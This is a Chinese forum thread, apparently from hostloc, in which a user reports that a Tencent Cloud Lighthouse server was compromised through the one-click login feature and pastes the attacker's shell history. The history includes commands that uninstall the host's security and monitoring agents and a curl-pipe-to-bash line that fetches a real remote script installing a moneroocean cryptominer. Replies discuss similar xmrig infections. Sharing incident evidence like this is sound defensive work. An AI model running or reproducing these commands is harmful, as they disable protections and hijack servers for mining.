谷姐靓号网前帖:https://hostloc.com/thread-1021600-1-1.html
轻量后台有个 一键登陆的锅
后门 脚本 :https://5.linshi.co/ww80.sh
找到lighthouse日志看到的
由于权限有限,所以除了挖矿搞不了啥,把一键登录关了,删了挖矿就好了。
#1651856332
sudo -i
#1651856364
/usr/local/qcloud/stargate/admin/uninstall.sh
#1651856364
/usr/local/qcloud/YunJing/uninst.sh
#1651856364
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
#1651856364
sudo -i
#1651856368
exit
#1651856382
curl -s -L https://5.linshi.co/ww80.sh | bash -s 100023489107
#1651856398
mv moneroocean .moneroocean
#1651856408
lsls
#1651856422
ls -a
#1653293830
w
#1653293952
exit
热议
推荐楼 fg9907 4天前
我家里的一台 thinkpad 被我当作服务器,最近也发现感染了 xmrig 挖矿病毒……
应该是我的 qbit 下载 web 页面我给暴露到了公网导致的(不然就是 docker 引起的)
2楼 HOH 5天前
不知所云
3楼 nnt 5天前
啥轻量漏洞,给个上下文 
4楼 菜单 5天前
你怎么发现
5楼 tboy 5天前
不知所云
6楼 司马南 5天前
我敢说这个脚本作者是mjj的一员
8楼 司马南 5天前
zxxx 发表于 2022-5-23 17:19
是他这个脚本我看到了小众的源码
9楼 似毛非毛 5天前
老哥牛逼。。。
10楼 金关村村长 5天前
是不是关闭了一键登陆就行了
12楼 委员 5天前
家贼难防
13楼 Tou 5天前
是不是关闭了一键登陆就行了
Yes
14楼 tomcb 4天前
人家是怎么进到你后台去一键登录的呢?这个不是更严重吗?
15楼 fg9907 4天前
我家里的一台 thinkpad 被我当作服务器,最近也发现感染了 xmrig 挖矿病毒……
应该是我的 qbit 下载 web 页面我给暴露到了公网导致的(不然就是 docker 引起的)
16楼 Tou 4天前
人家是怎么进到你后台去一键登录的呢?这个不是更严重吗?
肯定的啊,盲猜是腾讯的api有问题,毕竟权限组只有lighthouse,提不了权,只能挖矿
17楼 法外狂徒张三 昨天22:37
Tou 发表于 2022-5-24 10:48
肯定的啊,盲猜是腾讯的api有问题,毕竟权限组只有lighthouse,提不了权,只能挖矿 ...
不对吧,lighthouse是有权限sudo su的啊
我之前是可以sudo su的
18楼 superneed 昨天23:44
我的香港轻量就被搞了,cpu100%,root密码都被改了
19楼 Tou 6小时前
不对吧,lighthouse是有权限sudo su的啊
我之前是可以sudo su的
要不你再试试?passwd root 能改再说
20楼 rem 6小时前
特地去控制台看了下才搞明白你说的啥,我dd的系统登不上。
不过还是没搞懂,凉心的这个webshell api漏洞?
22楼 法外狂徒张三 11分钟前
要不你再试试?passwd root 能改再说
实测有权限
加sudo即可
申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。
评论前必须登录!
立即登录 注册